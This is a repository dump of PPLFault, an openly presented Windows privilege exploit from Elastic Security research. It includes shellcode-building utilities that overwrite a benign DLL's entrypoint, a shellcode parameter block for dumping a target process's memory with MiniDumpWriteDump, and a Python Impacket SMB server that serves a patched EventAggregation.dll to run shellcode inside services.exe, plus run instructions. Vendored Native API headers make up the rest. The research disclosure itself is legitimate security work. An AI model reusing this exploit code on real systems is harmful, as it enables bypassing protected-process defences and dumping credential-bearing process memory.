├── .gitignore ├── PPLFault ├── resource.h ├── PPLFault.h ├── Payload.aps ├── PPLFault.vcxproj.user ├── Payload.rc ├── Payload.h ├── PPLFault.vcxproj.filters ├── Payload.cpp └── PPLFault.vcxproj ├── GMShellcode ├── GMShellcode.def ├── GMShellcode.vcxproj.user ├── FunctionOrder.txt ├── GMShellcode.vcxproj.filters ├── GMShellcode.vcxproj ├── GMShellcode.h └── GMShellcode.c ├── GodFault ├── resource.h ├── Payload.aps ├── GodFault.vcxproj.user ├── Payload.rc ├── Payload.h ├── GodFault.vcxproj.filters ├── IPC.cpp ├── GodFault.vcxproj └── Payload.cpp ├── DumpShellcode ├── DumpShellcode.def ├── FunctionOrder.txt ├── DumpShellcode.vcxproj.user ├── DumpShellcode.vcxproj.filters ├── DumpShellcode.h ├── DumpShellcode.c └── DumpShellcode.vcxproj ├── Utils ├── MemoryCommand.h ├── Logging.h ├── PayloadUtils.h ├── Logging.cpp ├── MemoryCommand.cpp ├── PayloadUtils.cpp └── Utils.vcxproj ├── NoFault ├── NoFault.vcxproj.user ├── NoFault.vcxproj.filters ├── NoFault.h ├── NoFault.vcxproj └── NoFault.cpp ├── phnt ├── zw_options.txt ├── include │ ├── ntsmss.h │ ├── ntnls.h │ ├── ntxcapi.h │ ├── phnt_windows.h │ ├── phnt.h │ ├── subprocesstag.h │ ├── ntmisc.h │ ├── ntkeapi.h │ ├── ntgdi.h │ ├── ntpnpapi.h │ ├── ntdbg.h │ ├── phnt_ntdef.h │ ├── ntpfapi.h │ ├── nttp.h │ ├── ntobapi.h │ └── nttmapi.h └── README.md ├── python ├── README.md ├── smbserver.py └── PPLFault-Localhost-SMB.ps1 ├── LICENSE.txt ├── PPLFault.sln └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .vs 2 | x64 -------------------------------------------------------------------------------- /PPLFault/resource.h: -------------------------------------------------------------------------------- 1 | #define RES_PAYLOAD 1000 2 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | 3 | Shellcode 4 | EndShellcode 5 | -------------------------------------------------------------------------------- /GodFault/resource.h: -------------------------------------------------------------------------------- 1 | #define RES_PAYLOAD 1000 2 | #define RES_ORCHARD 1001 3 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | 3 | Shellcode 4 | EndShellcode 5 | -------------------------------------------------------------------------------- /DumpShellcode/FunctionOrder.txt: -------------------------------------------------------------------------------- 1 | Shellcode 2 | WhereAmI 3 | GetParams 4 | EndShellcode 5 | main -------------------------------------------------------------------------------- /GodFault/Payload.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gabriellandau/PPLFault/HEAD/GodFault/Payload.aps -------------------------------------------------------------------------------- /PPLFault/Payload.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gabriellandau/PPLFault/HEAD/PPLFault/Payload.aps -------------------------------------------------------------------------------- /Utils/MemoryCommand.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #define SE_PROFILE_SINGLE_PROCESS_PRIVILEGE 13 7 | 8 | bool EmptySystemWorkingSet(); 9 | -------------------------------------------------------------------------------- /NoFault/NoFault.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /GodFault/GodFault.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /GMShellcode/FunctionOrder.txt: -------------------------------------------------------------------------------- 1 | Shellcode 2 | ServicesShellcode 3 | CsrssShellcode 4 | CurrentTeb 5 | WhereAmI 6 | _wcslen 7 | _RtlInitUnicodeString 8 | memeq 9 | FindMyBase 10 | GetParams 11 | EndShellcode 12 | main -------------------------------------------------------------------------------- /GodFault/Payload.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | #ifdef _DEBUG 4 | RES_PAYLOAD RCDATA "..\\x64\\Debug\\GMShellcode.exe.shellcode" 5 | #else 6 | RES_PAYLOAD RCDATA "..\\x64\\Release\\GMShellcode.exe.shellcode" 7 | #endif -------------------------------------------------------------------------------- /PPLFault/Payload.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | #ifdef _DEBUG 4 | RES_PAYLOAD RCDATA "..\\x64\\Debug\\DumpShellcode.exe.shellcode" 5 | #else 6 | RES_PAYLOAD RCDATA "..\\x64\\Release\\DumpShellcode.exe.shellcode" 7 | #endif 8 | -------------------------------------------------------------------------------- /PPLFault/Payload.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | bool BuildPayload( 7 | HANDLE hBenignDll, 8 | std::string& payloadBuffer, 9 | DWORD dwTargetProcessId, 10 | PCWCHAR pDumpPath); 11 | -------------------------------------------------------------------------------- /GodFault/Payload.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | bool BuildPayload( 8 | HANDLE hBenignDll, 9 | std::string& payloadBuffer); 10 | 11 | bool BlessThread(DWORD dwThreadId, bool bFatal); -------------------------------------------------------------------------------- /Utils/Logging.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define Log(lvl, fmt, ...) LogMessage(LogLevel::##lvl, fmt, ##__VA_ARGS__) 6 | 7 | enum class LogLevel 8 | { 9 | Debug = 0, 10 | Info = 1, 11 | Warning = 2, 12 | Error = 3, 13 | }; 14 | 15 | void 16 | LogMessage( 17 | LogLevel level, 18 | const char* fmt, 19 | ...); 20 | 21 | void SetLogLevel(LogLevel lvl); 22 | -------------------------------------------------------------------------------- /phnt/zw_options.txt: -------------------------------------------------------------------------------- 1 | base=include 2 | in=ntdbg.h;ntexapi.h;ntgdi.h;ntioapi.h;ntkeapi.h;ntldr.h;ntlpcapi.h;ntmisc.h;ntmmapi.h;ntnls.h;ntobapi.h;ntpebteb.h;ntpfapi.h;ntpnpapi.h;ntpoapi.h;ntpsapi.h;ntregapi.h;ntrtl.h;ntsam.h;ntseapi.h;nttmapi.h;nttp.h;ntwow64.h;ntxcapi.h 3 | out=ntzwapi.h 4 | header=#ifndef _NTZWAPI_H\r\n#define _NTZWAPI_H\r\n\r\n// This file was automatically generated. Do not edit.\r\n\r\n 5 | footer=#endif\r\n -------------------------------------------------------------------------------- /Utils/PayloadUtils.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | // Finds the address within buf of the image entrypoint 7 | PVOID FindEntrypointVA(const std::string& buf); 8 | 9 | // Build a payload that consists of the given benign DLL with its entrypoint overwritten by our shellcode 10 | bool WriteShellcode(LPCWSTR lpResourceName, PVOID pBuf, SIZE_T maxLength, DWORD& bytesWritten); 11 | -------------------------------------------------------------------------------- /python/README.md: -------------------------------------------------------------------------------- 1 | # PPLFault via localhost SMB 2 | 3 | Performs the PPLFault exploit via a localhost SMB server. 4 | 5 | Usage: 6 | ``` 7 | powershell -ex bypass PPLFault-Localhost-SMB.ps1 8 | ``` 9 | 10 | If this machine has not yet run the exploit, the first run will perform some initial setup then prompt to reboot. Once setup has been completed, re-run the script to perform the exploit. 11 | 12 | The included payload runs an infinite loop inside `services.exe` running as `PsProtectedSignerWinTcb-Light`. 13 | -------------------------------------------------------------------------------- /phnt/include/ntsmss.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Windows Session Manager support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTSMSS_H 8 | #define _NTSMSS_H 9 | 10 | NTSYSAPI 11 | NTSTATUS 12 | NTAPI 13 | RtlConnectToSm( 14 | _In_ PUNICODE_STRING ApiPortName, 15 | _In_ HANDLE ApiPortHandle, 16 | _In_ DWORD ProcessImageType, 17 | _Out_ PHANDLE SmssConnection 18 | ); 19 | 20 | NTSYSAPI 21 | NTSTATUS 22 | NTAPI 23 | RtlSendMsgToSm( 24 | _In_ HANDLE ApiPortHandle, 25 | _In_ PPORT_MESSAGE MessageData 26 | ); 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /Utils/Logging.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #include 5 | #include 6 | #include 7 | #include "Logging.h" 8 | 9 | LogLevel gLogLevel = LogLevel::Info; 10 | 11 | void SetLogLevel(LogLevel lvl) 12 | { 13 | gLogLevel = lvl; 14 | } 15 | 16 | void 17 | LogMessage( 18 | LogLevel level, 19 | const char* fmt, 20 | ...) 21 | { 22 | va_list va; 23 | int result = 0; 24 | std::string prefixedFmt; 25 | 26 | const static char* prefixes[] = { 27 | " [+] ", // Debug 28 | " [+] ", // Info 29 | " [?] ", // Warning 30 | " [!] " // Error 31 | }; 32 | 33 | if (level < gLogLevel) 34 | { 35 | return; 36 | } 37 | 38 | prefixedFmt = prefixes[(size_t)level] + std::string(fmt) + "\n"; 39 | 40 | va_start(va, fmt); 41 | 42 | vprintf(prefixedFmt.c_str(), va); 43 | 44 | va_end(va); 45 | 46 | return; 47 | } 48 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | 19 | 20 | Source Files 21 | 22 | 23 | 24 | 25 | Header Files 26 | 27 | 28 | -------------------------------------------------------------------------------- /phnt/include/ntnls.h: -------------------------------------------------------------------------------- 1 | /* 2 | * National Language Support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTNLS_H 8 | #define _NTNLS_H 9 | 10 | #define MAXIMUM_LEADBYTES 12 11 | 12 | typedef struct _CPTABLEINFO 13 | { 14 | USHORT CodePage; 15 | USHORT MaximumCharacterSize; 16 | USHORT DefaultChar; 17 | USHORT UniDefaultChar; 18 | USHORT TransDefaultChar; 19 | USHORT TransUniDefaultChar; 20 | USHORT DBCSCodePage; 21 | UCHAR LeadByte[MAXIMUM_LEADBYTES]; 22 | PUSHORT MultiByteTable; 23 | PVOID WideCharTable; 24 | PUSHORT DBCSRanges; 25 | PUSHORT DBCSOffsets; 26 | } CPTABLEINFO, *PCPTABLEINFO; 27 | 28 | typedef struct _NLSTABLEINFO 29 | { 30 | CPTABLEINFO OemTableInfo; 31 | CPTABLEINFO AnsiTableInfo; 32 | PUSHORT UpperCaseTable; 33 | PUSHORT LowerCaseTable; 34 | } NLSTABLEINFO, *PNLSTABLEINFO; 35 | 36 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 37 | NTSYSAPI USHORT NlsAnsiCodePage; 38 | NTSYSAPI BOOLEAN NlsMbCodePageTag; 39 | NTSYSAPI BOOLEAN NlsMbOemCodePageTag; 40 | #endif 41 | 42 | #endif 43 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | 19 | 20 | Source Files 21 | 22 | 23 | 24 | 25 | Header Files 26 | 27 | 28 | -------------------------------------------------------------------------------- /phnt/README.md: -------------------------------------------------------------------------------- 1 | This collection of Native API header files has been maintained since 2009 for the Process Hacker project, and is the most up-to-date set of Native API definitions that I know of. I have gathered these definitions from official Microsoft header files and symbol files, as well as a lot of reverse engineering and guessing. See `phnt.h` for more information. 2 | 3 | ## Usage 4 | 5 | First make sure that your program is using the latest Windows SDK. 6 | 7 | These header files are designed to be used by user-mode programs. Instead of `#include `, place 8 | 9 | ``` 10 | #include 11 | #include 12 | ``` 13 | 14 | at the top of your program. The first line provides access to the Win32 API as well as the `NTSTATUS` values. The second line provides access to the entire Native API. By default, only definitions present in Windows XP are included into your program. To change this, use one of the following: 15 | 16 | ``` 17 | #define PHNT_VERSION PHNT_WINXP // Windows XP 18 | #define PHNT_VERSION PHNT_WS03 // Windows Server 2003 19 | #define PHNT_VERSION PHNT_VISTA // Windows Vista 20 | #define PHNT_VERSION PHNT_WIN7 // Windows 7 21 | #define PHNT_VERSION PHNT_WIN8 // Windows 8 22 | #define PHNT_VERSION PHNT_WINBLUE // Windows 8.1 23 | #define PHNT_VERSION PHNT_THRESHOLD // Windows 10 24 | ``` 25 | -------------------------------------------------------------------------------- /NoFault/NoFault.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Header Files 29 | 30 | 31 | -------------------------------------------------------------------------------- /Utils/MemoryCommand.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #include 5 | #include 6 | #define WIN32_NO_STATUS 7 | #include 8 | #include "MemoryCommand.h" 9 | #include "Logging.h" 10 | 11 | bool EmptySystemWorkingSet() 12 | { 13 | NTSTATUS ntStatus = STATUS_SUCCESS; 14 | DWORD command = 0; 15 | BOOLEAN ignore = 0; 16 | 17 | // Enable SeProfileSingleProcessPrivilege which is required for SystemMemoryListInformation 18 | ntStatus = RtlAdjustPrivilege(SE_PROFILE_SINGLE_PROCESS_PRIVILEGE, TRUE, FALSE, &ignore); 19 | if (0 != ntStatus) 20 | { 21 | Log(Error, "Failed to enable SeProfileSingleProcessPrivilege with NTSTATUS 0x%08x", ntStatus); 22 | return false; 23 | } 24 | 25 | // Empty working sets 26 | command = MemoryEmptyWorkingSets; 27 | ntStatus = NtSetSystemInformation(SystemMemoryListInformation, &command, sizeof(command)); 28 | if (0 != ntStatus) 29 | { 30 | Log(Error, "Failed to empty working sets with NTSTATUS 0x%08x", ntStatus); 31 | return false; 32 | } 33 | 34 | // Empty system standby list 35 | command = MemoryPurgeStandbyList; 36 | ntStatus = NtSetSystemInformation(SystemMemoryListInformation, &command, sizeof(command)); 37 | if (0 != ntStatus) 38 | { 39 | Log(Error, "Failed to empty standby list with NTSTATUS 0x%08x", ntStatus); 40 | return false; 41 | } 42 | 43 | Log(Debug, "Working set purged"); 44 | 45 | return true; 46 | } 47 | -------------------------------------------------------------------------------- /GodFault/GodFault.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Resource Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Resource Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | typedef NTSTATUS (NTAPI * RtlAdjustPrivilege_t)( 12 | DWORD privilege, 13 | BOOL bEnablePrivilege, 14 | BOOL IsThreadPrivilege, 15 | PDWORD PreviousValue); 16 | 17 | typedef HMODULE(WINAPI* LoadLibraryW_t)( 18 | LPCWSTR lpLibFileName 19 | ); 20 | 21 | typedef FARPROC(WINAPI* GetProcAddress_t)( 22 | HMODULE hModule, 23 | LPCSTR lpProcName 24 | ); 25 | 26 | typedef HANDLE(WINAPI* OpenProcess_t)( 27 | DWORD dwDesiredAccess, 28 | BOOL bInheritHandle, 29 | DWORD dwProcessId 30 | ); 31 | 32 | typedef HANDLE(WINAPI* CreateFileW_t)( 33 | LPCWSTR lpFileName, 34 | DWORD dwDesiredAccess, 35 | DWORD dwShareMode, 36 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 37 | DWORD dwCreationDisposition, 38 | DWORD dwFlagsAndAttributes, 39 | HANDLE hTemplateFile 40 | ); 41 | 42 | typedef BOOL(WINAPI* TerminateProcess_t)( 43 | HANDLE hProcess, 44 | UINT uExitCode 45 | ); 46 | 47 | typedef BOOL(WINAPI* MiniDumpWriteDump_t)( 48 | HANDLE hProcess, 49 | DWORD ProcessId, 50 | HANDLE hFile, 51 | MINIDUMP_TYPE DumpType, 52 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 53 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 54 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 55 | ); 56 | 57 | #define MAGIC1 0x1BADC0D3 58 | #define MAGIC2 0xDEADBEEF 59 | 60 | typedef struct _SHELLCODE_PARAMS 61 | { 62 | DWORD magic1; 63 | DWORD magic2; 64 | 65 | // User params 66 | DWORD dwTargetProcessId; 67 | WCHAR dumpPath[MAX_PATH]; 68 | 69 | // Strings (so we don't have to embed them in shellcode) 70 | CHAR szMiniDumpWriteDump[20]; // "MiniDumpWriteDump" 71 | WCHAR szDbgHelpDll[12]; // L"Dbghelp.dll" 72 | 73 | // IAT 74 | LoadLibraryW_t pLoadLibraryW; 75 | GetProcAddress_t pGetProcAddress; 76 | OpenProcess_t pOpenProcess; 77 | CreateFileW_t pCreateFileW; 78 | TerminateProcess_t pTerminateProcess; 79 | RtlAdjustPrivilege_t pRtlAdjustPrivilege; 80 | } SHELLCODE_PARAMS, * PSHELLCODE_PARAMS; 81 | 82 | #ifdef __cplusplus 83 | } // extern "C" 84 | #endif 85 | -------------------------------------------------------------------------------- /Utils/PayloadUtils.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "PayloadUtils.h" 6 | #include 7 | #include 8 | #include "Logging.h" 9 | 10 | extern bool InitShellcodeParams( 11 | PVOID pParams, 12 | DWORD dwTargetProcessId, 13 | PCWCHAR pDumpPath 14 | ); 15 | 16 | // Finds the address within buf of the image entrypoint 17 | PVOID FindEntrypointVA(const std::string& buf) 18 | { 19 | PVOID pBase = (PVOID)buf.data(); 20 | PIMAGE_NT_HEADERS pNtHeaders = ImageNtHeader(pBase); 21 | 22 | if (NULL == pNtHeaders) 23 | { 24 | Log(Error, "FindOffsetOfEntrypoint: ImageNtHeader failed with GLE %u. Is this a PE file?", GetLastError()); 25 | return NULL; 26 | } 27 | 28 | if (IMAGE_FILE_MACHINE_AMD64 != pNtHeaders->FileHeader.Machine) 29 | { 30 | Log(Error, "FindOffsetOfEntrypoint: Only x64 is supported"); 31 | return NULL; 32 | } 33 | 34 | // Map RVA -> VA 35 | return ImageRvaToVa(pNtHeaders, pBase, pNtHeaders->OptionalHeader.AddressOfEntryPoint, NULL); 36 | } 37 | 38 | // Pulls the shellcode out of our resource section and writes to the given pointer 39 | bool WriteShellcode(LPCWSTR lpResourceName, PVOID pBuf, SIZE_T maxLength, DWORD& bytesWritten) 40 | { 41 | HRSRC hr = NULL; 42 | HGLOBAL hg = NULL; 43 | LPVOID pResource = NULL; 44 | DWORD rSize = 0; 45 | 46 | hr = FindResourceW(NULL, lpResourceName, RT_RCDATA); 47 | if (!hr) 48 | { 49 | Log(Error, "GetShellcode: FindResource failed with GLE %u", GetLastError()); 50 | return false; 51 | } 52 | 53 | hg = LoadResource(NULL, hr); 54 | if (!hr) 55 | { 56 | Log(Error, "GetShellcode: LoadResource failed with GLE %u", GetLastError()); 57 | return false; 58 | } 59 | 60 | pResource = (LPVOID)LockResource(hg); 61 | if (!pResource) 62 | { 63 | Log(Error, "GetShellcode: LockResource failed with GLE %u", GetLastError()); 64 | return false; 65 | } 66 | 67 | rSize = SizeofResource(NULL, hr); 68 | if (!rSize) 69 | { 70 | Log(Error, "GetShellcode: SizeofResource returned 0 and GLE %u", GetLastError()); 71 | return false; 72 | } 73 | 74 | if (rSize > maxLength) 75 | { 76 | Log(Error, "GetShellcode: SizeofResource returned 0 and GLE %u", GetLastError()); 77 | return false; 78 | } 79 | 80 | memcpy(pBuf, pResource, rSize); 81 | bytesWritten = rSize; 82 | 83 | Log(Debug, "GetShellcode: %u bytes of shellcode written over DLL entrypoint", rSize); 84 | 85 | FreeResource(pResource); 86 | 87 | return true; 88 | } 89 | -------------------------------------------------------------------------------- /python/smbserver.py: -------------------------------------------------------------------------------- 1 | # PPLFault Localhost SMB Exploit 2 | # Gabriel Landau (@GabrielLandau) @ Elastic Security 3 | # 4 | # Wraps Impacket SMB server to serve two versions of a file for the same path. 5 | 6 | import os 7 | import msvcrt 8 | import pefile 9 | import argparse 10 | import win32con 11 | import win32file 12 | 13 | from impacket import smbserver 14 | 15 | HOOK_FD = None 16 | READ_COUNT = 0 17 | ORIG_READ = None 18 | ORIG_LSEEK = None 19 | 20 | def hook_read(fd, n): 21 | global HOOK_FD, READ_COUNT, ORIG_READ 22 | 23 | READ_COUNT += 1 24 | file_path = win32file.GetFinalPathNameByHandle(msvcrt.get_osfhandle(fd), win32con.VOLUME_NAME_NONE) 25 | 26 | if 'EventAggregation' in file_path: 27 | if READ_COUNT >= 3: 28 | fd = HOOK_FD 29 | print(f"Hooked read #{READ_COUNT}: PATCH") 30 | else: 31 | print(f"Hooked read #{READ_COUNT}: PASSTHROUGH") 32 | 33 | return ORIG_READ(fd, n) 34 | 35 | def hook_lseek(fd, pos, how): 36 | global HOOK_FD, READ_COUNT, ORIG_LSEEK 37 | file_path = win32file.GetFinalPathNameByHandle(msvcrt.get_osfhandle(fd), win32con.VOLUME_NAME_NONE) 38 | 39 | if 'EventAggregation' in file_path: 40 | fd = HOOK_FD 41 | 42 | ORIG_LSEEK(fd, pos, how) 43 | 44 | def patch(payload_hex): 45 | global HOOK_FD, ORIG_READ, ORIG_LSEEK 46 | 47 | src_path = r"C:\Windows\System32\EventAggregation.dll.bak" 48 | fc = open(src_path,'rb').read() 49 | 50 | payload = bytes.fromhex(payload_hex) 51 | pe = pefile.PE(src_path) 52 | offset = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint) 53 | length = len(payload) 54 | 55 | # Patch DllMain() with the payload 56 | patched_path = ".\EventAggregation.dll.patched" 57 | with open(patched_path,'wb') as out: 58 | out.write(fc[:offset]) 59 | out.write(payload) 60 | out.write(fc[offset+length:]) 61 | 62 | HOOK_FD = os.open(patched_path, os.O_RDONLY | os.O_BINARY) 63 | 64 | ORIG_READ = os.read 65 | os.read = hook_read 66 | 67 | ORIG_LSEEK = os.lseek 68 | os.lseek = hook_lseek 69 | 70 | if __name__ == '__main__': 71 | 72 | parser = argparse.ArgumentParser(add_help = True) 73 | parser.add_argument('-payload', action='store', default="ebfe", help='Shellcode payload for services.exe (hex - default EBFE infinite loop)') 74 | options = parser.parse_args() 75 | 76 | server = smbserver.SimpleSMBServer(listenAddress='127.0.0.1', listenPort=445) 77 | server.addShare('C$', 'C:\\', '') 78 | server.setSMB2Support(True) 79 | server.setSMBChallenge('') 80 | server.setLogFile('') 81 | 82 | patch(options.payload) 83 | server.start() 84 | -------------------------------------------------------------------------------- /phnt/include/ntxcapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Exception support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTXCAPI_H 8 | #define _NTXCAPI_H 9 | 10 | NTSYSAPI 11 | BOOLEAN 12 | NTAPI 13 | RtlDispatchException( 14 | _In_ PEXCEPTION_RECORD ExceptionRecord, 15 | _In_ PCONTEXT ContextRecord 16 | ); 17 | 18 | NTSYSAPI 19 | DECLSPEC_NORETURN 20 | VOID 21 | NTAPI 22 | RtlRaiseStatus( 23 | _In_ NTSTATUS Status 24 | ); 25 | 26 | NTSYSAPI 27 | VOID 28 | NTAPI 29 | RtlRaiseException( 30 | _In_ PEXCEPTION_RECORD ExceptionRecord 31 | ); 32 | 33 | NTSYSCALLAPI 34 | NTSTATUS 35 | NTAPI 36 | NtContinue( 37 | _In_ PCONTEXT ContextRecord, 38 | _In_ BOOLEAN TestAlert 39 | ); 40 | 41 | #if (PHNT_VERSION >= PHNT_THRESHOLD) 42 | typedef enum _KCONTINUE_TYPE 43 | { 44 | KCONTINUE_UNWIND, 45 | KCONTINUE_RESUME, 46 | KCONTINUE_LONGJUMP, 47 | KCONTINUE_SET, 48 | KCONTINUE_LAST, 49 | } KCONTINUE_TYPE; 50 | 51 | typedef struct _KCONTINUE_ARGUMENT 52 | { 53 | KCONTINUE_TYPE ContinueType; 54 | ULONG ContinueFlags; 55 | ULONGLONG Reserved[2]; 56 | } KCONTINUE_ARGUMENT, *PKCONTINUE_ARGUMENT; 57 | 58 | #define KCONTINUE_FLAG_TEST_ALERT 0x00000001 // wbenny 59 | #define KCONTINUE_FLAG_DELIVER_APC 0x00000002 // wbenny 60 | 61 | NTSYSCALLAPI 62 | NTSTATUS 63 | NTAPI 64 | NtContinueEx( 65 | _In_ PCONTEXT ContextRecord, 66 | _In_ PVOID ContinueArgument // PKCONTINUE_ARGUMENT and BOOLEAN are valid 67 | ); 68 | 69 | //FORCEINLINE 70 | //NTSTATUS 71 | //NtContinue( 72 | // _In_ PCONTEXT ContextRecord, 73 | // _In_ BOOLEAN TestAlert 74 | // ) 75 | //{ 76 | // return NtContinueEx(ContextRecord, (PCONTINUE_ARGUMENT)TestAlert); 77 | //} 78 | #endif 79 | 80 | NTSYSCALLAPI 81 | NTSTATUS 82 | NTAPI 83 | NtRaiseException( 84 | _In_ PEXCEPTION_RECORD ExceptionRecord, 85 | _In_ PCONTEXT ContextRecord, 86 | _In_ BOOLEAN FirstChance 87 | ); 88 | 89 | __analysis_noreturn 90 | NTSYSCALLAPI 91 | VOID 92 | NTAPI 93 | RtlAssert( 94 | _In_ PVOID VoidFailedAssertion, 95 | _In_ PVOID VoidFileName, 96 | _In_ ULONG LineNumber, 97 | _In_opt_ PSTR MutableMessage 98 | ); 99 | 100 | #define RTL_ASSERT(exp) \ 101 | ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, NULL), FALSE) : TRUE) 102 | #define RTL_ASSERTMSG(msg, exp) \ 103 | ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, msg), FALSE) : TRUE) 104 | #define RTL_SOFT_ASSERT(_exp) \ 105 | ((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n", __FILE__, __LINE__, #_exp), FALSE) : TRUE) 106 | #define RTL_SOFT_ASSERTMSG(_msg, _exp) \ 107 | ((!(_exp)) ? (DbgPrint("%s(%d): 